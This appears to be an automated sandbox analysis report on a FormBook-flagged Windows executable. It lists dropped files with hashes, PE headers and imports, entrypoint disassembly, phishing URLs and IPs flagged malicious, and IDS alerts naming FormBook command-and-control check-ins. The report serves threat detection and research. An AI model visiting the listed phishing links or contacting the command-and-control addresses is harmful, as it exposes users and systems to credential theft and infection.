	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	170.106.97.196
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu	Get hash	malicious	Unknown	Browse	170.106.97.195
	ReIayMSG__polarisrx.com_#7107380109.htm	Get hash	malicious	HTMLPhisher	Browse	119.28.146.206
	ReIayMSG__polarisrx.com_#6577807268.htm	Get hash	malicious	HTMLPhisher	Browse	119.28.147.117
	VM_MSG-Gf.htm	Get hash	malicious	HTMLPhisher	Browse	119.28.147.117
	https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde	Get hash	malicious	HTMLPhisher	Browse	49.51.78.226

Process:	C:\Windows\SysWOW64\logman.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut222.tmp

Download File

Process:	C:\Users\user\Desktop\YKzxWyqI6Y.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.9959935264746305
Encrypted:	true
SSDEEP:	6144:Pw1EcM6tFwFG41G86RQXbPMbfGrw5a99ExRzIWLTPa+6SA4/:Pw1EKiGdAbAf6sVpF/
MD5:	017462CEC55B92666C4D9482C6CBF888
SHA1:	70F41F762CC2A6BA2C7160B26CD2A5CC79DDE0C3
SHA-256:	9E6DD4A241936B5AB8C1881AFCAB3677A52B0D7BFD027ADF9F13D0DC32EC88C7
SHA-512:	8CF9471E81856A861E9A8131C718B7B534C618530A751E8C770BCD17B92BD98D391E5ED3316BE735B12325DBD4E47E604E6B7F65EA2A4A95C32CDEA1531D64F1
Malicious:	false
Reputation:	low
Preview:	...XP653@PB0..4W.H56V7A8.YLCVBGAXS653DPB0B74WAH56V7A8FYLCVBG.XS6;,.^B.K...@...._(Kf)>,10&,x0W[]+$bR'.F"/h\Xvs.kf4#'3lJLRw653DPB0;6=.\|(R.kW&.{9+.L..b3Q.)...."P.M....6P.j/:$~6%.AXS653DP.uB7xV@H...VA8FYLCVB.AZR=48DP.4B74WAH56VGT8FY\CVB7EXS6u3D@B0B54WGH56V7A8@YLCVBGAX#253FPB0B74UA..6V'A8VYLCVRGAHS653DPR0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYb73:3AXS.n7DPR0B7hSAH%6V7A8FYLCVBGAXs65SDPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B7

C:\Users\user\AppData\Local\Temp\differences

Download File

Process:	C:\Users\user\Desktop\YKzxWyqI6Y.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.9959935264746305
Encrypted:	true
SSDEEP:	6144:Pw1EcM6tFwFG41G86RQXbPMbfGrw5a99ExRzIWLTPa+6SA4/:Pw1EKiGdAbAf6sVpF/
MD5:	017462CEC55B92666C4D9482C6CBF888
SHA1:	70F41F762CC2A6BA2C7160B26CD2A5CC79DDE0C3
SHA-256:	9E6DD4A241936B5AB8C1881AFCAB3677A52B0D7BFD027ADF9F13D0DC32EC88C7
SHA-512:	8CF9471E81856A861E9A8131C718B7B534C618530A751E8C770BCD17B92BD98D391E5ED3316BE735B12325DBD4E47E604E6B7F65EA2A4A95C32CDEA1531D64F1
Malicious:	false
Reputation:	low
Preview:	...XP653@PB0..4W.H56V7A8.YLCVBGAXS653DPB0B74WAH56V7A8FYLCVBG.XS6;,.^B.K...@...._(Kf)>,10&,x0W[]+$bR'.F"/h\Xvs.kf4#'3lJLRw653DPB0;6=.\|(R.kW&.{9+.L..b3Q.)...."P.M....6P.j/:$~6%.AXS653DP.uB7xV@H...VA8FYLCVB.AZR=48DP.4B74WAH56VGT8FY\CVB7EXS6u3D@B0B54WGH56V7A8@YLCVBGAX#253FPB0B74UA..6V'A8VYLCVRGAHS653DPR0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYb73:3AXS.n7DPR0B7hSAH%6V7A8FYLCVBGAXs65SDPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B74WAH56V7A8FYLCVBGAXS653DPB0B7

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.2116803971374885
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YKzxWyqI6Y.exe
File size:	1'206'784 bytes
MD5:	938e53ee0f2e2d91fdc330563a4c2597
SHA1:	c8d9b347b9f5f94c1b38b657edc65c5fc0be2b96
SHA256:	ef322e64f7aaf33b58b0be9ec89572848e7292f3e8266573e6e25d65867c3fa5
SHA512:	7ae82f2d866d26dde29e7b6a8d0ac99726b35b4a2072e890567ca554542c1a0a1fdbe02ebf66b7dadef9d299921cf6daf5c34204c233a94113ac2f68a1ecf726
SSDEEP:	24576:Uu6J33O0c+JY5UZ+XC0kGso6FaQhUa0dDarhoPSxavPSKV4WY:uu0c++OCvkGs9FaQhf8SY6YY
TLSH:	CF45BE2273DDC360CB669173BF69B3056EBB7C610630B85B2F983D79A970161162C7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	1006468686860e00

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6750E002 [Wed Dec 4 23:04:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F624D1C9EBAh
jmp 00007F624D1BCC84h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F624D1BCE0Ah
cmp edi, eax
jc 00007F624D1BD16Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F624D1BCE09h
rep movsb
jmp 00007F624D1BD11Ch
cmp ecx, 00000080h
jc 00007F624D1BCFD4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F624D1BCE10h
bt dword ptr [004BE324h], 01h
jc 00007F624D1BD2E0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F624D1BCFADh
test edi, 00000003h
jne 00007F624D1BCFBEh
test esi, 00000003h
jne 00007F624D1BCF9Dh
bt edi, 02h
jnc 00007F624D1BCE0Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F624D1BCE13h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F624D1BCE65h
bt esi, 03h
jnc 00007F624D1BCEB8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5e1fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5e1fc	0x5e200	decf345b88d9d07f1d6fc6a6b1e89afa	False	0.9560611719787516	data	7.9369314991244915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.07946058091286307
RT_MENU	0xc9d78	0x50	data	English	Great Britain	0.9
RT_STRING	0xc9dc8	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca35c	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xca9e8	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcae78	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb474	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbad0	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcbf38	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc090	0x58c4f	data			1.0003327841935759
RT_GROUP_ICON	0x124ce0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x124cf4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x124d08	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x124d1c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x124d30	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x124e0c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T07:58:28.283234+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49828	172.217.18.115	80	TCP
2025-01-11T07:58:28.283234+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49828	172.217.18.115	80	TCP
2025-01-11T07:58:52.128657+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49984	194.9.94.86	80	TCP
2025-01-11T07:58:54.687838+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50001	194.9.94.86	80	TCP
2025-01-11T07:58:57.261004+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50005	194.9.94.86	80	TCP
2025-01-11T07:58:59.786517+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50006	194.9.94.86	80	TCP
2025-01-11T07:58:59.786517+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50006	194.9.94.86	80	TCP
2025-01-11T07:59:15.347890+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50007	101.32.205.61	80	TCP
2025-01-11T07:59:17.870864+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50008	101.32.205.61	80	TCP
